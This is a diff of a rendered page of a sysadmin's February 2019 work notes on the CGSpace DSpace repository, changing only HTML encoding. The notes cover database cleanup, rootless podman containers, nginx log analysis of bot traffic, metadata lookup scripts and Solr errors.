<pre><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id=2 GROUP BY text_lang ORDER BY count DESC;
<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id=2 GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
| 1069539
@ -778,7 +778,7 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
<li>Theoretically this field could help if you wanted to search for Spanish-language fields in the API or something, but even for the English fields there are two different values (and those are from DSpace itself)!</li>
<li>I&rsquo;m going to normalized these to <code>NULL</code> at least on DSpace Test for now:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_lang = NULL WHERE resource_type_id=2 AND text_lang IS NOT NULL;
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang = NULL WHERE resource_type_id=2 AND text_lang IS NOT NULL;
UPDATE 1045410
</code></pre><ul>
<li>I started proofing IITA&rsquo;s 2019-01 records that Sisay uploaded this week
@ -790,20 +790,20 @@ UPDATE 1045410
<li>ILRI ICT fixed the password for the CGSpace support email account and I tested it on Outlook 365 web and DSpace and it works</li>
<li>Re-create my local PostgreSQL container to for new PostgreSQL version and to use podman&rsquo;s volumes:</li>
</ul>
<pre><code>$ podman pull postgres:9.6-alpine
<pre tabindex="0"><code>$ podman pull postgres:9.6-alpine
$ podman volume create dspacedb_data
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost dspace_2019-02-11.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><ul>
<li>And it&rsquo;s all running without root!</li>
<li>Then re-create my Artifactory container as well, taking into account ulimit open file requirements by Artifactory as well as the user limitations caused by rootless subuid mappings:</li>
</ul>
<pre><code>$ podman volume create artifactory_data
<pre tabindex="0"><code>$ podman volume create artifactory_data
artifactory_data
$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
$ buildah unshare
@ -817,13 +817,13 @@ $ podman start artifactory
<ul>
<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
</ul>
<pre><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(162844) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(162844) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);&#39;
UPDATE 1
</code></pre><ul>
<li>I merged the Atmire Metadata Quality Module (MQM) changes to the <code>5_x-prod</code> branch and deployed it on CGSpace (<a href="https://github.com/ilri/DSpace/pull/407">#407</a>)</li>
@ -834,7 +834,7 @@ UPDATE 1
<li>Jesus fucking Christ, Linode sent an alert that CGSpace (linode18) was using 421% CPU for a few hours this afternoon (server time):</li>
<li>There seems to have been a lot of activity in XMLUI:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1236 18.212.208.240
1276 54.164.83.99
1277 3.83.14.11
@ -845,7 +845,7 @@ UPDATE 1
1327 52.54.252.47
1477 5.9.6.51
1861 94.71.244.172
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
8 42.112.238.64
9 121.52.152.3
9 157.55.39.50
@ -856,15 +856,15 @@ UPDATE 1
28 66.249.66.219
43 34.209.213.122
178 50.116.102.77
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
2727
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
186
</code></pre><ul>
<li>94.71.244.172 is in Greece and uses the user agent &ldquo;Indy Library&rdquo;</li>
<li>At least they are re-using their Tomcat session:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172' dspace.log.2019-02-18 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172&#39; dspace.log.2019-02-18 | sort | uniq | wc -l
</code></pre><ul>
<li>
<p>The following IPs were all hitting the server hard simultaneously and are located on Amazon and use the user agent &ldquo;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&rdquo;:</p>
@ -886,7 +886,7 @@ UPDATE 1
<p>For reference most of these IPs hitting the XMLUI this afternoon are on Amazon:</p>
</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 30
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 30
1173 52.91.249.23
1176 107.22.118.106
1178 3.88.173.152
@ -920,7 +920,7 @@ UPDATE 1
</code></pre><ul>
<li>In the case of 52.54.252.47 they are only making about 10 requests per minute during this time (albeit from dozens of concurrent IPs):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E '18/Feb/2019:1[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E &#39;18/Feb/2019:1[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
10 18/Feb/2019:17:20
10 18/Feb/2019:17:22
10 18/Feb/2019:17:31
@ -935,7 +935,7 @@ UPDATE 1
<li>As this user agent is not recognized as a bot by DSpace this will definitely fuck up the usage statistics</li>
<li>There were 92,000 requests from these IPs alone today!</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c &#39;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&#39;
92756
</code></pre><ul>
<li>I will add this user agent to the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/nginx/default.conf.j2">&ldquo;badbots&rdquo; rate limiting in our nginx configuration</a></li>
@ -943,7 +943,7 @@ UPDATE 1
<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2019-02-18-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-02-18-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2019-02-18-combined-orcids.txt -o /tmp/2019-02-18-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -956,7 +956,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>Unfortunately, I don&rsquo;t see any strange activity in the web server API or XMLUI logs at that time in particular</li>
<li>So far today the top ten IPs in the XMLUI logs are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;19/Feb/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
11541 18.212.208.240
11560 3.81.136.184
11562 3.88.237.84
@ -978,7 +978,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>The top requests in the API logs today are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;19/Feb/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
42 66.249.66.221
44 156.156.81.215
55 3.85.54.129
@ -999,17 +999,17 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I need to follow up with the DSpace developers and Atmire to see how they classify which requests are bots so we can try to estimate the impact caused by these users and perhaps try to update the list to make the stats more accurate</li>
<li>I found one IP address in Nigeria that has an Android user agent and has requested a bitstream from <a href="https://hdl.handle.net/10568/96140">10568/96140</a> almost 200 times:</li>
</ul>
<pre><code># grep 41.190.30.105 /var/log/nginx/access.log | grep -c 'acgg_progress_report.pdf'
<pre tabindex="0"><code># grep 41.190.30.105 /var/log/nginx/access.log | grep -c &#39;acgg_progress_report.pdf&#39;
185
</code></pre><ul>
<li>Wow, and another IP in Nigeria made a bunch more yesterday from the same user agent:</li>
</ul>
<pre><code># grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c 'acgg_progress_report.pdf'
<pre tabindex="0"><code># grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c &#39;acgg_progress_report.pdf&#39;
346
</code></pre><ul>
<li>In the last two days alone there were 1,000 requests for this PDF, mostly from Nigeria!</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v 'upstream response is buffered' | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v &#39;upstream response is buffered&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1 139.162.146.60
1 157.55.39.159
1 196.188.127.94
@ -1032,7 +1032,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</code></pre><ul>
<li>That is so weird, they are all using this Android user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Linux; Android 7.0; TECNO Camon CX Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Linux; Android 7.0; TECNO Camon CX Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
</code></pre><ul>
<li>I wrote a quick and dirty Python script called <code>resolve-addresses.py</code> to resolve IP addresses to their owning organization&rsquo;s name, ASN, and country using the <a href="https://ipapi.co">IPAPI.co API</a></li>
</ul>
@ -1042,9 +1042,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I told him that they should probably try to use the REST API&rsquo;s <code>find-by-metadata-field</code> endpoint</li>
<li>The annoying thing is that you have to match the text language attribute of the field exactly, but it does work:</li>
</ul>
<pre><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: &quot;&quot;}'
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: null}'
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;&#34;}&#39;
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: null}&#39;
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>This returns six items for me, which is the <a href="https://cgspace.cgiar.org/discover?filtertype_1=orcid&amp;filter_relational_operator_1=contains&amp;filter_1=Alan+S.+Orth%3A+0000-0002-1735-7458&amp;submit_apply_filter=&amp;query=">same I see in a Discovery search</a></li>
<li>Hector Tobon from CIAT asked if it was possible to get item statistics from CGSpace so I told him to use my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
@ -1063,23 +1063,23 @@ $ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: applica
<li>It allows specifying the language the term should be queried in as well as output files to save the matched and unmatched terms to</li>
<li>I ran our top 1500 subjects through English, Spanish, and French and saved the matched and unmatched terms to separate files:</li>
</ul>
<pre><code>$ ./agrovoc-lookup.py -l en -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-en.txt -or /tmp/rejected-subjects-en.txt
<pre tabindex="0"><code>$ ./agrovoc-lookup.py -l en -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-en.txt -or /tmp/rejected-subjects-en.txt
$ ./agrovoc-lookup.py -l es -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-es.txt -or /tmp/rejected-subjects-es.txt
$ ./agrovoc-lookup.py -l fr -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-fr.txt -or /tmp/rejected-subjects-fr.txt
</code></pre><ul>
<li>Then I generated a list of all the unique matched terms:</li>
</ul>
<pre><code>$ cat /tmp/matched-subjects-* | sort | uniq &gt; /tmp/2019-02-21-matched-subjects.txt
<pre tabindex="0"><code>$ cat /tmp/matched-subjects-* | sort | uniq &gt; /tmp/2019-02-21-matched-subjects.txt
</code></pre><ul>
<li>And then a list of all the unique <em>unmatched</em> terms using some utility I&rsquo;ve never heard of before called <code>comm</code> or with <code>diff</code>:</li>
</ul>
<pre><code>$ sort /tmp/top-1500-subjects.txt &gt; /tmp/subjects-sorted.txt
<pre tabindex="0"><code>$ sort /tmp/top-1500-subjects.txt &gt; /tmp/subjects-sorted.txt
$ comm -13 /tmp/2019-02-21-matched-subjects.txt /tmp/subjects-sorted.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
$ diff --new-line-format=&quot;&quot; --unchanged-line-format=&quot;&quot; /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
$ diff --new-line-format=&#34;&#34; --unchanged-line-format=&#34;&#34; /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
</code></pre><ul>
<li>Generate a list of countries and regions from CGSpace for Sisay to look through:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-countries.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-countries.csv WITH CSV HEADER;
COPY 202
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 227 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-regions.csv WITH CSV HEADER;
COPY 33
@ -1124,20 +1124,20 @@ COPY 33
<p>I figured out how to query AGROVOC from OpenRefine using Jython by creating a custom text facet:</p>
</li>
</ul>
<pre><code>import json
<pre tabindex="0"><code>import json
import re
import urllib
import urllib2
pattern = re.compile('^S[A-Z ]+$')
pattern = re.compile(&#39;^S[A-Z ]+$&#39;)
if pattern.match(value):
url = 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=' + urllib.quote_plus(value) + '&amp;lang=en'
url = &#39;http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=&#39; + urllib.quote_plus(value) + &#39;&amp;lang=en&#39;
get = urllib2.urlopen(url)
data = json.load(get)
if len(data['results']) == 1:
return &quot;matched&quot;
if len(data[&#39;results&#39;]) == 1:
return &#34;matched&#34;
return &quot;unmatched&quot;
return &#34;unmatched&#34;
</code></pre><ul>
<li>You have to make sure to URL encode the value with <code>quote_plus()</code> and it totally works, but it seems to refresh the facets (and therefore re-query everything) when you select a facet so that makes it basically unusable</li>
<li>There is a <a href="https://programminghistorian.org/en/lessons/fetch-and-parse-data-with-openrefine#example-2-url-queries-and-parsing-json">good resource discussing OpenRefine, Jython, and web scraping</a></li>
@ -1148,16 +1148,16 @@ return &quot;unmatched&quot;
<li>I&rsquo;m not sure how to deal with terms like &ldquo;CORN&rdquo; that are alternative labels (<code>altLabel</code>) in AGROVOC where the preferred label (<code>prefLabel</code>) would be &ldquo;MAIZE&rdquo;</li>
<li>For example, <a href="http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=CORN*&amp;lang=en">a query</a> for <code>CORN*</code> returns:</li>
</ul>
<pre><code> &quot;results&quot;: [
<pre tabindex="0"><code> &#34;results&#34;: [
{
&quot;altLabel&quot;: &quot;corn (maize)&quot;,
&quot;lang&quot;: &quot;en&quot;,
&quot;prefLabel&quot;: &quot;maize&quot;,
&quot;type&quot;: [
&quot;skos:Concept&quot;
&#34;altLabel&#34;: &#34;corn (maize)&#34;,
&#34;lang&#34;: &#34;en&#34;,
&#34;prefLabel&#34;: &#34;maize&#34;,
&#34;type&#34;: [
&#34;skos:Concept&#34;
],
&quot;uri&quot;: &quot;http://aims.fao.org/aos/agrovoc/c_12332&quot;,
&quot;vocab&quot;: &quot;agrovoc&quot;
&#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_12332&#34;,
&#34;vocab&#34;: &#34;agrovoc&#34;
},
</code></pre><ul>
<li>There are dozens of other entries like &ldquo;corn (soft wheat)&rdquo;, &ldquo;corn (zea)&rdquo;, &ldquo;corn bran&rdquo;, &ldquo;Cornales&rdquo;, etc that could potentially match and to determine if they are related programatically is difficult</li>
@ -1176,7 +1176,7 @@ return &quot;unmatched&quot;
<li>There seems to be something going on with Solr on CGSpace (linode18) because statistics on communities and collections are blank for January and February this year</li>
<li>I see some errors started recently in Solr (yesterday):</li>
</ul>
<pre><code>$ grep -c ERROR /home/cgspace.cgiar.org/log/solr.log.2019-02-*
<pre tabindex="0"><code>$ grep -c ERROR /home/cgspace.cgiar.org/log/solr.log.2019-02-*
/home/cgspace.cgiar.org/log/solr.log.2019-02-11.xz:0
/home/cgspace.cgiar.org/log/solr.log.2019-02-12.xz:0
/home/cgspace.cgiar.org/log/solr.log.2019-02-13.xz:0
@ -1195,7 +1195,7 @@ return &quot;unmatched&quot;
<li>But I don&rsquo;t see anything interesting in yesterday&rsquo;s Solr log&hellip;</li>
<li>I see this in the Tomcat 7 logs yesterday:</li>
</ul>
<pre><code>Feb 25 21:09:29 linode18 tomcat7[1015]: Error while updating
<pre tabindex="0"><code>Feb 25 21:09:29 linode18 tomcat7[1015]: Error while updating
Feb 25 21:09:29 linode18 tomcat7[1015]: java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
Feb 25 21:09:29 linode18 tomcat7[1015]: at org.dspace.statistics.SolrLogger$9.visit(SourceFile:1241)
Feb 25 21:09:29 linode18 tomcat7[1015]: at org.dspace.statistics.SolrLogger.visitEachStatisticShard(SourceFile:268)
@ -1207,7 +1207,7 @@ Feb 25 21:09:29 linode18 tomcat7[1015]: at org.dspace.statistics.Statist
<li>In the Solr admin GUI I see we have the following error: &ldquo;statistics-2011: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher&rdquo;</li>
<li>I restarted Tomcat and upon startup I see lots of errors in the systemd journal, like:</li>
</ul>
<pre><code>Feb 25 21:37:49 linode18 tomcat7[28363]: SEVERE: IOException while loading persisted sessions: java.io.StreamCorruptedException: invalid type code: 00
<pre tabindex="0"><code>Feb 25 21:37:49 linode18 tomcat7[28363]: SEVERE: IOException while loading persisted sessions: java.io.StreamCorruptedException: invalid type code: 00
Feb 25 21:37:49 linode18 tomcat7[28363]: java.io.StreamCorruptedException: invalid type code: 00
Feb 25 21:37:49 linode18 tomcat7[28363]: at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1601)
Feb 25 21:37:49 linode18 tomcat7[28363]: at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:2287)
@ -1220,7 +1220,7 @@ Feb 25 21:37:49 linode18 tomcat7[28363]: at sun.reflect.NativeMethodAcce
<li>Also, now the Solr admin UI says &ldquo;statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher&rdquo;</li>
<li>In the Solr log I see:</li>
</ul>
<pre><code>2019-02-25 21:38:14,246 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2015]: Error opening new searcher
<pre tabindex="0"><code>2019-02-25 21:38:14,246 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2015]: Error opening new searcher
org.apache.solr.common.SolrException: Error opening new searcher
at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:873)
at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:646)
@ -1239,12 +1239,12 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
... 33 more
2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2015': Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2015&#39;: Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
</code></pre><ul>
<li>I tried to shutdown Tomcat and remove the locks:</li>
</ul>
<pre><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr -iname &quot;*.lock&quot; -delete
<pre tabindex="0"><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr -iname &#34;*.lock&#34; -delete
# systemctl start tomcat7
</code></pre><ul>
<li>&hellip; but the problem still occurs</li>
@ -1254,7 +1254,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>I did some tests with calling a shell script from systemd on DSpace Test (linode19) and the <code>LimitAS</code> setting does work, and the <code>infinity</code> setting in systemd does get translated to &ldquo;unlimited&rdquo; on the service</li>
<li>I thought it might be open file limit, but it seems we&rsquo;re nowhere near the current limit of 16384:</li>
</ul>
<pre><code># lsof -u dspace | wc -l
<pre tabindex="0"><code># lsof -u dspace | wc -l
3016
</code></pre><ul>
<li>For what it&rsquo;s worth I see the same errors about <code>solr_update_time_stamp</code> on DSpace Test (linode19)</li>
@ -1270,7 +1270,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>I sent a mail to the dspace-tech mailing list about the &ldquo;solr_update_time_stamp&rdquo; error</li>
<li>A CCAFS user sent a message saying they got this error when submitting to CGSpace:</li>
</ul>
<pre><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1021 by user 3049
<pre tabindex="0"><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1021 by user 3049
</code></pre><ul>
<li>According to the <a href="https://cgspace.cgiar.org/rest/collections/1021">REST API</a> collection 1021 appears to be <a href="https://cgspace.cgiar.org/handle/10568/66581">CCAFS Tools, Maps, Datasets and Models</a></li>
<li>I looked at the <code>WORKFLOW_STEP_1</code> (Accept/Reject) and the group is of course empty</li>
@ -1287,7 +1287,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>He asked me to upload the files for him via the command line, but the file he referenced (<code>Thumbnails_feb_2019.zip</code>) doesn&rsquo;t exist</li>
<li>I noticed that the command line batch import functionality is a bit weird when using zip files because you have to specify the directory where the zip file is location as well as the zip file&rsquo;s name:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace import -a -e aorth@stfu.com -m mapfile -s /home/aorth/Downloads/2019-02-27-test/ -z SimpleArchiveFormat.zip
<pre tabindex="0"><code>$ ~/dspace/bin/dspace import -a -e aorth@stfu.com -m mapfile -s /home/aorth/Downloads/2019-02-27-test/ -z SimpleArchiveFormat.zip
</code></pre><ul>
<li>Why don&rsquo;t they just derive the directory from the path to the zip file?</li>
<li>Working on Udana&rsquo;s Restoring Degraded Landscapes (RDL) WLE records that we originally started in 2018-11 and fixing many of the same problems that I originally did then
